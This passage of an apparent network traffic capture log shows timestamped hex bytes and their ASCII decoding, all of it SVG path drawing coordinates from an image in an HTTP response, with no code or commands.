2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 33 34 2c 32 39 30 2e 39 31 61 31 2e 37
                                                                                                                                                                                                                                                  Data Ascii: 0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M731.57,297.84a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.52-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M731.34,290.91a1.7
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4453INData Raw: 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 34 32 2c 32 30 30 2e 30 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 31 39 2c 31 39 33 2e 31 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d
                                                                                                                                                                                                                                                  Data Ascii: th><path class="cls-4" d="M749.42,200.06a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M749.19,193.12a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4469INData Raw: 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 30 2e 36 35 2c 32 38 39 2e 32 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32
                                                                                                                                                                                                                                                  Data Ascii: ,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M780.65,289.24a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4485INData Raw: 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 35 2c 31 39 31 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68
                                                                                                                                                                                                                                                  Data Ascii: .34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M798.5,191.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4501INData Raw: 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 30 2c 32 38 37 2e 35 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 37 32 2c 32 38 30 2e 36 33 61 31 2e 37 32 2c 31 2e 37
                                                                                                                                                                                                                                                  Data Ascii: 0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M830,287.57a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M829.72,280.63a1.72,1.7
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4517INData Raw: 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 38 31 2c 31 38 39 2e 37 39 41 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2c 38 34 37 2c 31 39 32 61 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 35 37 2c 31 38 32 2e 38 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31
                                                                                                                                                                                                                                                  Data Ascii: 0,1,.16,2.86"></path><path class="cls-4" d="M847.81,189.79A1.72,1.72,0,0,1,847,192a2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><path class="cls-4" d="M847.57,182.85a1.73,1.73,0,0,1-.78,2.24,2.51
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4533INData Raw: 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2c 32 37 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35
                                                                                                                                                                                                                                                  Data Ascii: s="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M879,279a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.5
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4549INData Raw: 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 36 2e 38 38 2c 31 38 31 2e 31 38 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30
                                                                                                                                                                                                                                                  Data Ascii: 0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M896.88,181.18a1.72,1.72,0,0,1-.78,2.24,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4565INData Raw: 2d 33 2e 33 34 2d 31 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 33 35 2c 32 37 37 2e 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70
                                                                                                                                                                                                                                                  Data Ascii: -3.34-1,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M928.35,277.3a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><p
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4581INData Raw: 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 32 31 2c 32 39 33 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 34 34 2c 33 30 30 2e 30 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37
                                                                                                                                                                                                                                                  Data Ascii: 0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.21,293.24a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.44,300.07a1.7,1.7,0,0,1,.77-2.2,2.47
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4597INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 34 35 2c 32 30 35 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 36 39 2c 32 31 32 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                  Data Ascii: cls-4" d="M1007.45,205.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M1007.69,212.24a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4613INData Raw: 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 36 2e 39 33 2c 31 32 34 2e 34 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 37 2e 31 36 2c 31 33 31 2e 32 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34
                                                                                                                                                                                                                                                  Data Ascii: .08,0,0,1-.15-2.81"></path><path class="cls-4" d="M976.93,124.42a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.38,2.38,0,0,1-.51,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M977.16,131.24a1.7,1.7,0,0,1,.77-2.2,2.4
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC4629INData Raw: 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 38 32 2c 32 33 34 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                  Data Ascii: -.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M959.82,234.37a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC4645INData Raw: 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 33 2c 31 35 33 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                                                                                                  Data Ascii: ,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.3,153.37a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC4661INData Raw: 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2e 31 38 2c 32 36 33 2e 33 33 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: 2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912.18,263.33a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC4677INData Raw: 4d 38 38 31 2e 34 33 2c 31 37 35 2e 35 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 38 31 2e 36 36 2c 31 38 32 2e 33 33 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c
                                                                                                                                                                                                                                                  Data Ascii: M881.43,175.5a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M881.66,182.33a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC4693INData Raw: 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 33 31 2c 32 38 35 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 35 34 2c 32 39 32 2e 32 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33
                                                                                                                                                                                                                                                  Data Ascii: </path><path class="cls-4" d="M864.31,285.45a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M864.54,292.28a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC4709INData Raw: 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 33 2e 37 39 2c 32 30 34 2e 34 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 34 2c 32 31 31 2e 32 38 61 31 2e 37 2c 31 2e 37 2c
